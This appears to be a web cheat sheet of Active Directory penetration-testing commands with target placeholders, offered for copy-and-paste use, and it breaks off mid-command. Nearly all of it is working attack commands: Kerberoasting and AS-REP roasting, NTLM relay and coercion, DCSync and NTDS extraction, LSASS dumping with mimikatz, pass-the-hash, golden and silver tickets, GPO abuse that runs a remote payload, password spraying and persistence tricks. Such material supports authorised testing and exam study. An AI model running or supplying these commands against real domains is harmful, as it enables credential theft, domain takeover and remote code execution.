Cheat-Sheet · Komut Matrisi
1119 komut · port / phase / platform / tool / exam ile filtrele. Üstten hedefini gir, hepsi otomatik ikame edilir; kopyala çalışır komutu verir.
bloodhound-python -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' -ns {{DC_IP}} -c All --zip nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' -M daclread -o TARGET_DN='CN={{USER}},CN=Users,DC=...' ACTION=read bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' get writable bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' set password 'TARGET_USER' 'Newp@ss123!' net rpc password 'TARGET_USER' 'Newp@ss123!' -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -S {{DC_HOST}} bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' add groupMember 'TARGET_GROUP' '{{USER}}' net rpc group addmem 'TARGET_GROUP' '{{USER}}' -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -S {{DC_HOST}} certipy-ad shadow auto -u {{USER}}@{{DOMAIN}} -p '{{PASS}}' -account 'TARGET_USER' -dc-ip {{DC_IP}} pywhisker -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --target 'TARGET_USER' --action add --dc-ip {{DC_IP}} targetedKerberoast.py -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' --dc-ip {{DC_IP}} Set-DomainObject -Identity 'TARGET_USER' -Set @{serviceprincipalname='fake/ROAST'}; Get-DomainSPNTicket -Identity 'TARGET_USER' impacket-dacledit -action 'write' -rights 'DCSync' -principal '{{USER}}' -target-dn 'DC=...,DC=...' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' add dcsync '{{USER}}' impacket-owneredit -action write -new-owner '{{USER}}' -target 'TARGET_USER' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} impacket-dacledit -action 'write' -rights 'FullControl' -principal '{{USER}}' -target 'TARGET_USER' '{{DOMAIN}}/{{USER}}:{{PASS}}' -dc-ip {{DC_IP}} nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --gmsa bloodyAD --host {{DC_IP}} -d {{DOMAIN}} -u {{USER}} -p '{{PASS}}' get object 'GMSA01$' --attr msDS-ManagedPassword Add-DomainObjectAcl -TargetIdentity 'DC=...,DC=...' 
-PrincipalIdentity '{{USER}}' -Rights DCSync certipy find -u {{USER}}@{{DOMAIN}} -p {{PASS}} -dc-ip {{DC_IP}} -vulnerable -stdout certipy req -u {{USER}}@{{DOMAIN}} -p {{PASS}} -dc-ip {{DC_IP}} -ca 'CA-NAME' -template 'VulnTemplate' -upn administrator@{{DOMAIN}} certipy auth -pfx administrator.pfx -dc-ip {{DC_IP}} certipy auth -pfx administrator.pfx -dc-ip {{DC_IP}} -domain {{DOMAIN}} -username administrator impacket-ntlmrelayx -t http://{{RHOST}}/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy auth -pfx administrator.pfx -ldap-shell -dc-ip {{DC_IP}} passthecert.py -action whoami -crt user.crt -key user.key -domain {{DOMAIN}} -dc-ip {{DC_IP}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile users.txt -no-pass -format hashcat -outputfile asrep.hash impacket-GetNPUsers {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -format hashcat -outputfile asrep.hash nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --asreproast asrep.hash Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash /nowrap hashcat -m 18200 asrep.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule Get-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol | fl curl -L https://ghst.ly/getbhce -o docker-compose.yml && docker compose up -d sudo neo4j start && bloodhound --no-sandbox bloodhound-python -c All -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -ns {{DC_IP}} --zip bloodhound-python -c All,LoggedOn -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -ns {{DC_IP}} -dc {{DC_HOST}} --kerberos bloodhound-python -c All -u '{{USER}}' --hashes :{{NTHASH}} -d {{DOMAIN}} -ns {{DC_IP}} --zip SharpHound.exe -c All --zipfilename loot SharpHound.exe -c DCOnly --ldapusername '{{USER}}' --ldappassword '{{PASS}}' SharpHound.exe -c All,LoggedOn -d {{DOMAIN}} --domaincontroller {{DC_IP}} --collectionmethod Session,ACL nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --bloodhound -c All --dns-server {{DC_IP}} MATCH p=shortestPath((u:User 
{owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@{{DOMAIN}}'})) RETURN p MATCH (u:User)-[r:GenericAll|GenericWrite|WriteDacl|WriteOwner|Owns]->(t) WHERE u.owned=true RETURN u,r,t MATCH (c:Computer) WHERE c.unconstraineddelegation=true RETURN c.name nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000 kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} {{WORDLIST}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile users.txt -no-pass -format hashcat nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash bloodhound-python -d {{DOMAIN}} -u {{USER}} -p {{PASS}} -ns {{DC_IP}} -c All --zip impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-ntlmrelayx -t ldaps://{{DC_IP}} -smb2support --delegate-access impacket-ntlmrelayx -t ldap://{{DC_IP}} --escalate-user {{USER}} -smb2support impacket-ntlmrelayx -t http://{{RHOST}}/certsrv/certfnsh.asp -smb2support --adcs --template DomainController petitpotam.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} {{LHOST}} {{DC_IP}} printerbug.py {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} {{LHOST}} coercer coerce -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -t {{DC_IP}} -l {{LHOST}} dfscoerce.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} {{LHOST}} {{DC_IP}} impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator -dc-ip {{DC_IP}} '{{DOMAIN}}/ATTACK$:Attack123!' 
hashcat -m 18200 asrep.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 13100 kerberoast.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 1000 ntlm.txt {{WORDLIST}} -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule hashcat -m 5600 netntlmv2.txt {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule hashcat -m 13100 kerberoast.hash {{WORDLIST}} --force --status --status-timer=10 -O -w 3 hashcat -m 13100 kerberoast.hash --show john --format=krb5tgs --wordlist={{WORDLIST}} kerberoast.hash hashcat -m 1000 ntlm.txt -a 3 ?u?l?l?l?l?d?d?d?d nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_password nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M gpp_autologin impacket-Get-GPPPassword -dc-ip {{DC_IP}} {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_HOST}} smbclient //{{DC_IP}}/SYSVOL -U '{{DOMAIN}}/{{USER}}%{{PASS}}' -c 'recurse ON; prompt OFF; mget *' gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth --lsa nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} --local-auth --sam impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} nxc smb {{RHOSTS}} -u {{USER}} -p {{PASS}} --spider C\$ --content --pattern password pass cpassword impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc-ntlm {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc-user {{DOMAIN}}/krbtgt {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-secretsdump -just-dc -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{DC_IP}} nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds --user krbtgt mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt mimikatz # lsadump::dcsync /domain:{{DOMAIN}} /user:Administrator Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity {{USER}} -Rights DCSync nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --trusted-for-delegation Get-DomainUser 
-TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto; Get-DomainComputer -TrustedToAuth -Properties dnshostname,msds-allowedtodelegateto ldapsearch -x -H ldap://{{DC_IP}} -D "{{USER}}@{{DOMAIN}}" -w '{{PASS}}' -b "DC={{DOMAIN}},DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo userAccountControl impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator -hashes :{{NTHASH}} '{{DOMAIN}}/{{USER}}' KRB5CCNAME=Administrator@cifs_{{DC_HOST}}.ccache impacket-psexec -k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} Rubeus.exe s4u /user:{{USER}} /rc4:{{NTHASH}} /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /ptt Rubeus.exe s4u /user:{{USER}} /rc4:{{NTHASH}} /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /altservice:host,ldap,http,wsman /ptt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --trusted-for-delegation Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol ldapsearch -x -H ldap://{{DC_IP}} -D "{{USER}}@{{DOMAIN}}" -w '{{PASS}}' -b "DC={{DOMAIN}},DC=local" "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName dNSHostName Rubeus.exe monitor /interval:5 /filteruser:{{DC_HOST}}$ /nowrap Rubeus.exe dump /service:krbtgt /nowrap impacket-printerbug '{{DOMAIN}}/{{USER}}:{{PASS}}'@{{DC_IP}} {{LHOST}} impacket-petitpotam -d {{DOMAIN}} -u {{USER}} -p {{PASS}} {{LHOST}} {{DC_IP}} Rubeus.exe ptt /ticket:doIF...base64TGT... 
lsadump::dcsync /domain:{{DOMAIN}} /user:{{DOMAIN}}\krbtgt KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass '{{DOMAIN}}/{{DC_HOST}}$@{{DC_HOST}}' -just-dc-user krbtgt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -d {{DOMAIN}} --query "(memberOf=CN=DnsAdmins,CN=Users,DC=domain,DC=local)" "sAMAccountName" net group "DnsAdmins" /domain msfvenom -p windows/x64/exec CMD='net group "Domain Admins" {{USER}} /add /domain' -f dll -o /tmp/dns_plugin.dll impacket-smbserver share /tmp/ -smb2support dnscmd {{DC_HOST}} /config /serverlevelplugindll \\{{LHOST}}\share\dns_plugin.dll dnscmd {{DC_HOST}} /config /serverlevelplugindll \\{{LHOST}}\share\dns_plugin.dll /s sc.exe \\{{DC_HOST}} stop dns && sc.exe \\{{DC_HOST}} start dns reg query \\{{DC_HOST}}\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll nxc smb {{DC_IP}} -u {{USER}} -H {{NTHASH}} -d {{DOMAIN}} -x "net group 'Domain Admins'" dnscmd {{DC_HOST}} /config /serverlevelplugindll nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --users nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --groups nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --pass-pol nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --users nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --password-not-required nxc ldap {{DC_IP}} -u '{{USER}}' -H {{NTHASH}} --trusted-for-delegation ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(objectClass=user)' sAMAccountName description memberOf ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(&(objectClass=user)(servicePrincipalName=*))' sAMAccountName servicePrincipalName rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'enumdomusers' rpcclient -U '{{DOMAIN}}/{{USER}}%{{PASS}}' {{DC_IP}} -c 'querygroupmem 0x200; queryuser 0x1f4' enum4linux-ng -u '{{USER}}' -p '{{PASS}}' -A {{DC_IP}} pywerview get-netuser -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} --dc-ip {{DC_IP}} impacket-GetADUsers -all -dc-ip 
{{DC_IP}} '{{DOMAIN}}/{{USER}}:{{PASS}}' Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname | fl Get-DomainGroupMember -Identity 'Domain Admins' -Recurse ADSearch.exe --domain {{DOMAIN}} --search '(&(objectCategory=user)(servicePrincipalName=*))' --attributes samaccountname,serviceprincipalname ADExplorer.exe -snapshot "" C:\Temp\snap.dat {{DC_HOST}} nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000 enum4linux-ng -A {{DC_IP}} rpcclient -U '' -N {{DC_IP}} rpcclient -U '' -N {{DC_IP}} -c 'enumdomusers' rpcclient -U '' -N {{DC_IP}} -c 'querydominfo;getdompwinfo' impacket-lookupsid {{DOMAIN}}/guest@{{DC_IP}} -no-pass ldapsearch -x -H ldap://{{DC_IP}} -s base namingcontexts ldapsearch -x -H ldap://{{DC_IP}} -b 'DC=corp,DC=local' '(objectClass=user)' sAMAccountName nxc ldap {{DC_IP}} -u '' -p '' --query '(objectClass=domain)' '' smbclient -L //{{DC_IP}} -N bloodhound-python -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc {{DC_HOST}} -ns {{DC_IP}} -c All nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -M maq && nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --gmsa Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? 
{ $_.ActiveDirectoryRights -match 'WriteProperty|GenericWrite|WriteDacl' } Get-DomainOU | Get-DomainComputer -SearchBase $_.distinguishedname; Get-DomainGPO -Identity "{GPO-GUID}" | select gplink,displayname python3 pygpoabuse.py {{DOMAIN}}/{{USER}}:{{PASS}} -gpo-id "{GPO-GUID}" -command "net group 'Domain Admins' {{USER}} /add /domain" -taskname "Update" -description "benign" python3 pygpoabuse.py {{DOMAIN}}/{{USER}} -hashes :{{NTHASH}} -gpo-id "{GPO-GUID}" -command "{{LHOST}}\share\rev.exe" -user SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author {{DOMAIN}}\{{USER}} --Command "cmd.exe" --Arguments "/c net group 'Domain Admins' {{USER}} /add /domain" --GPOName "VulnerableGPO" SharpGPOAbuse.exe --AddUserTask --TaskName "Update" --Author {{DOMAIN}}\{{USER}} --Command "cmd.exe" --Arguments "/c {{LHOST}}\share\rev.exe" --GPOName "VulnerableGPO" New-GPOImmediateTask -TaskName Update -GPODisplayName "VulnerableGPO" -CommandArguments '-c "net group ..."' -Force gpupdate /force nxc smb {{DC_IP}} -u {{USER}} -H {{NTHASH}} -x "net group 'Domain Admins'" impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile kerberoast.hash impacket-GetUserSPNs {{DOMAIN}}/{{USER}} -hashes :{{NTHASH}} -dc-ip {{DC_IP}} -request -outputfile kerberoast.hash nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --kerberoasting kerberoast.hash impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} Rubeus.exe kerberoast /outfile:kerberoast.hash /nowrap Rubeus.exe kerberoast /user:{{USER}} /nowrap targetedKerberoast.py -v -d {{DOMAIN}} -u {{USER}} -p {{PASS}} --dc-ip {{DC_IP}} hashcat -m 13100 kerberoast.hash {{WORDLIST}} -r /usr/share/hashcat/rules/best64.rule nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --laps nxc smb {{RHOST}} -u 'administrator' -p '{{PASS}}' --local-auth pyLAPS.py --action get -d {{DOMAIN}} -u '{{USER}}' -p '{{PASS}}' --dc-ip {{DC_IP}} laps.py -u '{{USER}}' -p '{{PASS}}' -d {{DOMAIN}} -l {{DC_IP}} ldapsearch -x -H 
ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(ms-Mcs-AdmPwd=*)' ms-Mcs-AdmPwd sAMAccountName ldapsearch -x -H ldap://{{DC_IP}} -D '{{USER}}@{{DOMAIN}}' -w '{{PASS}}' -b 'DC=corp,DC=local' '(msLAPS-EncryptedPassword=*)' msLAPS-Password sAMAccountName Get-DomainObject -Identity '{{RHOST}}' -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime evil-winrm -i {{RHOST}} -u administrator -p '{{PASS}}' nxc smb {{RHOSTS}} -u {{USER}} -H {{NTHASH}} --local-auth nxc smb {{RHOST}} -u {{USER}} -H {{NTHASH}} -x 'whoami /all' impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-wmiexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-smbexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} impacket-atexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} 'whoami' impacket-dcomexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} impacket-getTGT -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}} -dc-ip {{DC_IP}} export KRB5CCNAME={{USER}}.ccache; impacket-wmiexec -k -no-pass {{DOMAIN}}/{{USER}}@{{DC_HOST}} KRB5CCNAME={{USER}}.ccache nxc smb {{DC_HOST}} -k --use-kcache -x 'whoami' Rubeus.exe asktgt /user:{{USER}} /rc4:{{NTHASH}} /domain:{{DOMAIN}} /dc:{{DC_IP}} /ptt Rubeus.exe ptt /ticket:ticket.kirbi sekurlsa::pth /user:{{USER}} /domain:{{DOMAIN}} /ntlm:{{NTHASH}} /run:powershell.exe nxc rdp {{RHOST}} -u {{USER}} -H {{NTHASH}} xfreerdp /v:{{RHOST}} /u:{{USER}} /pth:{{NTHASH}} /d:{{DOMAIN}} +clipboard impacket-psexec -k -no-pass {{DOMAIN}}/{{USER}}@{{DC_HOST}} nxc smb {{RHOST}} -u {{USER}} -p {{PASS}} -M lsassy tasklist /fi "imagename eq lsass.exe" rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp nanodump.x64.exe --write C:\Windows\Temp\lsass.dmp pypykatz lsa minidump C:/loot/lsass.dmp mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords nmap -Pn -p 88,135,139,389,445,464,636,3268,3269,5985 -sV --script=ldap-rootdse {{DC_IP}} nxc smb {{DC_IP}} echo '{{DC_IP}} {{DC_HOST}} {{DOMAIN}}' | sudo tee -a /etc/hosts sudo ntpdate {{DC_IP}} nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --shares bloodhound-python -d {{DOMAIN}} -u {{USER}} -p {{PASS}} -ns {{DC_IP}} -c All --zip impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} nxc mssql {{RHOSTS}} -u {{USER}} -p '{{PASS}}' --local-auth nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -q 'SELECT @@version; SELECT IS_SRVROLEMEMBER(''sysadmin'')' impacket-mssqlclient {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} -windows-auth enable_xp_cmdshell nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -X 'whoami' --local-auth EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; SELECT SYSTEM_USER; EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin'); SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; EXEC sp_linkedservers; SELECT srvname, isremote FROM sysservers; EXEC ('SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED\SQL]; EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC xp_cmdshell ''whoami''') AT [LINKED\SQL]; nxc mssql {{RHOST}} -u {{USER}} -p '{{PASS}}' -M mssql_priv EXEC master..xp_dirtree '\\{{LHOST}}\share', 1, 1; responder -I {{INTERFACE}} -wv impacket-ntlmrelayx -t smb://{{RHOST}} -smb2support --no-http-server -i EXEC master..xp_subdirs '\\{{LHOST}}\share'; vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit reg save HKLM\SYSTEM C:\Windows\Temp\system.hive diskshadow /s C:\Windows\Temp\ds.txt ntdsutil "ac i ntds" "ifm" "create 
full C:\Windows\Temp\ifm" q q impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL impacket-secretsdump -ntds ntds.dit -system system.hive -security security.hive LOCAL nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --ntds vss lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt privilege::debug; misc::skeleton lsadump::lsa /inject /name:krbtgt token::elevate; lsadump::sam New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name DsrmAdminLogonBehavior -Value 2 -PropertyType DWORD -Force misc::memssp lsadump::dcshadow /object:CN=target,CN=Users,DC=corp,DC=local /attribute:SIDHistory /value:S-1-5-21-...-519 Add-DomainObjectAcl -TargetIdentity "DC={{DOMAIN}}" -PrincipalIdentity {{USER}} -Rights DCSync Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC={{DOMAIN}}' -PrincipalIdentity {{USER}} -Rights All nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} -M ntdsutil impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} responder -I {{INTERFACE}} -wd responder -I {{INTERFACE}} -A grep -ri 'NTLMv2' /usr/share/responder/logs/ ; ls -la /usr/share/responder/logs/ hashcat -m 5600 hashes.txt {{WORDLIST}} mitm6 -d {{DOMAIN}} -i {{INTERFACE}} impacket-ntlmrelayx -6 -t ldaps://{{DC_IP}} -wh attacker-wpad --delegate-access nxc smb {{RHOSTS}} --gen-relay-list relay_targets.txt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -M maq impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'Fake123!' -dc-host {{DC_HOST}} -domain-netbios {{DOMAIN}} '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-rbcd -delegate-from 'FAKE01$' -delegate-to '{{DC_HOST}}$' -action write '{{DOMAIN}}/{{USER}}:{{PASS}}' impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator '{{DOMAIN}}/FAKE01$:Fake123!' KRB5CCNAME=Administrator@cifs_{{DC_HOST}}.ccache impacket-psexec -k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} Set-DomainRBCD -Identity {{DC_HOST}} -DelegateFrom 'FAKE01$' Rubeus.exe hash /password:Fake123! 
/user:FAKE01$ /domain:{{DOMAIN}} Rubeus.exe s4u /user:FAKE01$ /aes256:<AES256_KEY> /impersonateuser:Administrator /msdsspn:cifs/{{DC_HOST}} /ptt nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --delegate Administrator python3 sccmhunter.py find -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} python3 sccmhunter.py smb -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} -save python3 sccmhunter.py http -u {{USER}} -p {{PASS}} -d {{DOMAIN}} -dc-ip {{DC_IP}} --auto SharpSCCM.exe get secrets -u {{USER}} -p {{PASS}} python3 pxethief.py 1 {{RHOST}} impacket-ntlmrelayx -t http://{{RHOST}}/ccm_system_windowsauth/request -smb2support --adcs python3 sccmhunter.py admin -u {{USER}} -p {{PASS}} -ip {{RHOST}} SCCMHunter#> get_user {{USER}}; add_admin {{USER}} S-1-5-21-... SharpSCCM.exe exec -d "All Systems" -p "reverse_shell" --run-as-system nxc smb {{RHOSTS}} -u {{USER}} -H {{NTHASH}} -d {{DOMAIN}} kerbrute passwordspray -d {{DOMAIN}} --dc {{DC_IP}} users.txt '{{PASS}}' nxc smb {{DC_IP}} -u users.txt -p '{{PASS}}' --continue-on-success nxc ldap {{DC_IP}} -u users.txt -p '{{PASS}}' --continue-on-success nxc smb {{DC_IP}} -u '{{USER}}' -p passwords.txt --continue-on-success nxc smb {{DC_IP}} -u '' -p '' --pass-pol kerbrute passwordspray -d {{DOMAIN}} --dc {{DC_IP}} users.txt '{{PASS}}' --safe nxc smb {{DC_IP}} -u users.txt -H {{NTHASH}} --continue-on-success Invoke-PasswordSprayOWA -ExchHostname {{RHOST}} -UserList users.txt -Password '{{PASS}}' o365spray --spray -U users.txt -p '{{PASS}}' --domain {{DOMAIN}} Invoke-MSOLSpray -UserList users.txt -Password '{{PASS}}' impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} Administrator impacket-ticketer -aesKey {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} -user-id 500 -groups 512,513,518,519,520 Administrator impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain {{DOMAIN}} -spn cifs/{{DC_HOST}} Administrator export KRB5CCNAME=$(pwd)/Administrator.ccache; impacket-psexec 
-k -no-pass {{DOMAIN}}/Administrator@{{DC_HOST}} nxc smb {{DC_HOST}} --use-kcache -x "whoami" Rubeus.exe golden /rc4:{{NTHASH}} /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /user:Administrator /ptt Rubeus.exe silver /service:cifs/{{DC_HOST}} /rc4:{{NTHASH}} /sid:{{DOMAIN_SID}} /domain:{{DOMAIN}} /user:Administrator /ptt Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:{{NTHASH}} /nowrap kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{NTHASH}} /id:500 /groups:512,513,518,519,520 /ptt kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /target:{{DC_HOST}} /service:cifs /rc4:{{NTHASH}} /ptt lsadump::dcsync /domain:{{DOMAIN}} /user:krbtgt impacket-getPac -targetUser Administrator {{DOMAIN}}/{{USER}}:{{PASS}} Get-DomainTrust -Domain {{DOMAIN}} Get-DomainTrustMapping nltest /domain_trusts /all_trusts nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} -M enum_trusts impacket-ticketer -nthash {{NTHASH}} -domain-sid {{DOMAIN_SID}} -domain child.{{DOMAIN}} -extra-sid S-1-5-21-PARENTSID-519 Administrator kerberos::golden /user:Administrator /domain:child.{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{NTHASH}} /sids:S-1-5-21-PARENTSID-519 /ptt impacket-raiseChild {{DOMAIN}}/{{USER}}:{{PASS}} impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} nxc ldap {{DC_IP}} -u {{USER}} -p {{PASS}} --gmsa python3 gMSADumper.py -u {{USER}} -p {{PASS}} -d {{DOMAIN}} GoldenGMSA.exe compute --sid {{DOMAIN_SID}} --kdskey <KDSRootKeyB64> impacket-mssqlclient {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} -windows-auth enum_links EXEC ('EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE; EXEC 